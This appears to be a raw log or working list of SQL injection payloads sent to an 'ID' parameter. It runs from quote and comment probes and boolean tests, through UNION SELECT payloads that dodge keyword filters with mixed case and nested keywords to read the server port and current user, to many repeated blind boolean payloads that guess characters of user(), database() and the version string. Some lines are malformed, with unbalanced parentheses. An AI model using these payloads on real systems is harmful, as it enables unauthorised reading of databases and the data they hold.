ID:1
ID:1'
ID:1"
ID:1' AND 1=1 -- 
ID:1 AND 1=1 -- 
ID:1 AND 1=0 -- 
ID:1" AND 1=0 -- 
ID:1" AND 1=1 -- 
ID:1' AND 1=1 -- 
ID:1') AND 1=1 -- 
ID:1\
ID:1')
ID:1') -- 
ID:1 -- 
ID:1 AND 1 -- 
ID:1 AND 0 -- 
ID:1') AND 0 -- 
ID:1') AND 1 -- 
ID:1') AND 1 -- 
ID:1')
AND
1
 -- 
ID:1')
AND
1
#
ID:1') #
ID:1') #
ID:1') #
ID:99') 
uniunionon
  selSelectect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
 SeLect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
all
 SeLect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
all
 SeLect
 1,user(),3
OR ('1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((user()))),1)='a')='1
ID:1'=(left((user()))),1)='a')='1
ID:1'=(left((user()))),1)='a')='1
ID:1'=(left((user()))),1)='a')='1
ID:1'=(left((user()))),1)='r')='1
ID:1'=(left((user()))),1)='r')='1
ID:1'=(left((user()))),1)='r')='1
ID:1'=(left((user()))),1)='r')='1
ID:1
ID:1
ID:1
ID:1'
ID:1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left((select(version())),1)='s')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(version())),1)='5')='1
ID:1'=(left((select(@@version)),1)='5')='1
ID:1'=(left((select(@@version)),1)='5')='1
ID:1'=(left((select(@@version)),1)='5')='1
ID:1'=(left((select(@@version)),1)='5')='1
ID:1'=(left((select(@@version)),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='a')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a'='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5'='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='o')='1
